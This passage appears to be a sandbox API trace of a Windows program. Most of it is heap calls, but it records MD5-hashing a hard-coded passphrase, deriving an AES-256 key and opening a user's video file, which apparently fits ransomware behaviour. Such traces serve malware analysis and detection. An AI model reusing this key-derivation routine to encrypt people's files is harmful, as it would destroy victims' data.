Size=0x10) returned 0x43ca8b0 [0107.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0107.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0107.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0107.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0107.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0107.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0107.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0107.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a48 [0107.788] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0107.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a48 | out: hHeap=0x1780000) returned 1 [0107.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0107.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8e0 [0107.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0107.788] PeekMessageW (in: lpMsg=0x144e32c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e32c) returned 0 [0107.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0107.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0107.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0107.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0107.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0107.788] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0107.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0107.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0107.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0107.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0107.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0107.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0107.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0107.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0107.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0107.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0107.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0107.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0107.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0107.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0107.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0107.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0107.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0107.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0107.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0107.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0107.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0107.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0107.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0107.789] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0107.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0107.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0107.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0107.790] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0107.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0107.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0107.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0107.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0107.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0107.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0107.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0107.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0107.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0107.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0107.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0107.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0107.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0107.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0107.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0107.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0107.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0107.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0107.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0107.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0107.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0107.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0107.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0107.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0107.790] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0107.791] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1797108, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0107.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0107.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0107.791] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0107.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0107.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0107.791] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0107.791] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796e88, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0107.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0107.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0107.791] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0107.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0107.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0107.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d20 | out: hHeap=0x1780000) returned 1 [0107.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0107.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0107.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0107.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0107.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0107.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0107.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd60 | out: hHeap=0x1780000) returned 1 [0107.791] CryptAcquireContextA (in: phProv=0x144e300, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e300*=0x41a5250) returned 1 [0107.792] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0107.792] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0107.792] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0107.792] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0107.792] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0107.792] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0107.792] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0107.792] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0107.792] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0107.792] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0107.792] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0107.792] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0107.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0107.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0107.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0107.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0107.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0107.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0107.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0107.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0107.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0107.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0107.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0107.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0107.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0107.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0107.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0107.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0107.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0107.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0107.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0107.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0107.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0107.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0107.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0107.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0107.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0107.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0107.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0107.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0107.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0107.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0107.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0107.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0107.794] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0107.833] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0107.833] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0107.833] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0107.833] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0107.833] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0107.833] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0107.833] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0107.833] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0107.833] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0107.833] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43cabf8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0107.833] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e070 | out: phHash=0x144e070) returned 1 [0107.833] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0107.833] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e28a8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0107.833] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0107.834] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0107.834] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2788, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0107.834] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0107.834] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0107.834] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0107.834] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43cab38, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0107.834] CryptHashData (hHash=0x41ac140, pbData=0x17e2728, dwDataLen=0x22, dwFlags=0x1) returned 1 [0107.834] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0107.834] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0107.834] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0107.834] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0107.834] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43cac88, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0107.834] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac140, dwFlags=0x1, phKey=0x144e070 | out: phKey=0x144e070*=0x41ac2c0) returned 1 [0107.834] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0107.834] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0107.834] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0107.834] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796f28, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0107.834] CryptDestroyHash (hHash=0x41ac140) returned 1 [0107.835] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\tr4gQM\\Cu3r8FST64g6XD.flv" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\tr4gqm\\cu3r8fst64g6xd.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0107.835] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0107.835] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144e7a8 | out: lpNewFilePointer=0x0) returned 1 [0107.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0107.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0107.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0107.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0107.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0107.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0107.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797048 [0107.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0107.835] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0107.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0107.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0107.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0107.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0107.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0107.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0107.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0107.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0107.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f08 [0107.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0107.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0107.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0107.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0107.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0107.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0107.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0107.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0107.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0107.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0107.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0107.836] RtlAllocateHeap (HeapHandle=0x1780000, 